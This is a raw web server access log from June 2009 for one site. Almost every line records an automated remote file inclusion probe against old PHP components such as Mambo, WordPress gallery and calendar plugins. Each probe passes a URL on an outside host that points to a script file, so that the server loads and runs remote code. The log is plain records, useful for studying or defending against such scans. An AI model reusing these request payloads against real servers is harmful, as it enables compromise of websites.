84.201.208.50 - - [21/Jun/2009:12:34:39 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20916 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:50 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:50 -0700] "GET /logs/access_090523.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:50 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:50 -0700] "GET /logs/access_080718.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:54 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:54 -0700] "GET /logs/access_090523.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:34:54 -0700] "GET /logs/access_080718.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:35:05 -0700] "GET /logs/access_080410.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:35:08 -0700] "GET /logs/access_080718.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:35:08 -0700] "GET /logs/access_090523.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:35:15 -0700] "GET /logs/access_090210.log//ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:35:24 -0700] "GET /logs/access_080423.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:35:47 -0700] "GET /logs/access_081026.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:36:02 -0700] "GET /logs/access_081016.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:36:02 -0700] "GET /logs/access_081029.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:36:54 -0700] "GET /logs/access_080718.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:36:54 -0700] "GET /logs/access_090523.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:36:57 -0700] "GET /logs/access_080718.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:36:57 -0700] "GET /logs/access_090523.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:37:14 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:37:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:37:14 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:37:20 -0700] "GET /logs/access_090109.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:37:20 -0700] "GET /logs/access_080503.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.70.114 - - [21/Jun/2009:12:37:32 -0700] "GET /logs/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.70.114 - - [21/Jun/2009:12:37:32 -0700] "GET /logs/access_080816.log%20%20/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.70.114 - - [21/Jun/2009:12:37:32 -0700] "GET /interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:37:46 -0700] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:37:46 -0700] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:37:46 -0700] "GET /logs/access_090113.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:37:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:37:55 -0700] "GET /logs/access_080115.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:37:58 -0700] "GET /logs/access_090120.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:37:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:38:03 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:38:05 -0700] "GET /logs/access_090226.log///?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:38:06 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 200 20996 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:38:08 -0700] "GET /logs/access_080831.log///?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:38:28 -0700] "GET /logs/access_081029.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:38:28 -0700] "GET /logs/access_081016.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:38:32 -0700] "GET /logs/access_081101.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.70.114 - - [21/Jun/2009:12:38:33 -0700] "GET /logs/access_080816.log/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:38:33 -0700] "GET /logs/access_080514.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:38:33 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:38:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:38:37 -0700] "GET /logs/access_090531.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:12:38:38 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:12:38:38 -0700] "GET /logs/access_080409.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:12:38:38 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:38:47 -0700] "GET /logs/access_080313.log//?phpAds_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:38:52 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20918 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:39:01 -0700] "GET /logs/access_090426.log/index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:39:04 -0700] "GET /logs/index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:39:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:39:26 -0700] "GET /logs/access_090113.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.156.3 - - [21/Jun/2009:12:39:31 -0700] "GET /logs/access_081117.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:39:37 -0700] "GET /logs/access_090323.log/index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:39:48 -0700] "GET /index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 7977 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:40:15 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:40:30 -0700] "GET /logs/access_080222.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:41:41 -0700] "GET /logs/access_090426.log/index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:41:43 -0700] "GET /index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.0" 404 7960 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:41:43 -0700] "GET /logs/index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:08 -0700] "GET /logs/access_080514.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:08 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:12:42:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.136.16 - - [21/Jun/2009:12:42:10 -0700] "GET /logs/access_090323.log/index.php.strona?=http://www.peb.com.ua/ua/pid.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:14 -0700] "GET /logs/access_090531.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:23 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20918 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:23 -0700] "GET /logs/access_080204.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:32 -0700] "GET /logs/access_080525.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:35 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:35 -0700] "GET /logs/access_080514.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:42:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:40 -0700] "GET /solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:40 -0700] "GET /logs/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:40 -0700] "GET /logs/access_080529.log/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:43 -0700] "GET /logs/access_090531.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:42:49 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:42:49 -0700] "GET /logs/access_080222.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:42:50 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20918 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:56 -0700] "GET /solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:57 -0700] "GET /logs/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:57 -0700] "GET /logs/access_090410.log%20%20/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:42:57 -0700] "GET /logs/access_080831.log%20%20/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/access_090109.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/access_080503.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/access_080831.log/solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/access_080529.log/solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/access_080529.log%20%20/solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:42:59 -0700] "GET /logs/access_080831.log%20%20/solpot.html?body=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:43:14 -0700] "GET /logs/access_090328.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.203.196.99 - - [21/Jun/2009:12:43:14 -0700] "GET /logs/access_090203.log/show_news.php?cutepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
74.203.196.99 - - [21/Jun/2009:12:43:14 -0700] "GET /logs/access_090203.log/show_news.php?cutepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
74.203.196.99 - - [21/Jun/2009:12:43:14 -0700] "GET /show_news.php?cutepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
74.203.196.99 - - [21/Jun/2009:12:43:14 -0700] "GET /show_news.php?cutepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
74.203.196.99 - - [21/Jun/2009:12:43:14 -0700] "GET /logs/show_news.php?cutepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
74.203.196.99 - - [21/Jun/2009:12:43:14 -0700] "GET /logs/show_news.php?cutepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:18 -0700] "GET /logs/access_080529.log/solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:18 -0700] "GET /solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:18 -0700] "GET /logs/access_080831.log/solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:18 -0700] "GET /solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:18 -0700] "GET /logs/solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:18 -0700] "GET /logs/solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:43:18 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:32 -0700] "GET /logs/access_080624.log%20%20/solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:12:43:32 -0700] "GET /logs/access_080831.log%20%20/solpot.html?body=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:43:45 -0700] "GET /logs/access_080816.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:43:47 -0700] "GET /logs/access_080521.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:43:49 -0700] "GET /logs/access_090328.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:43:53 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:43:54 -0700] "GET /logs/access_080831.log/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:43:55 -0700] "GET /logs/access_080730.log/solpot.html?body=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
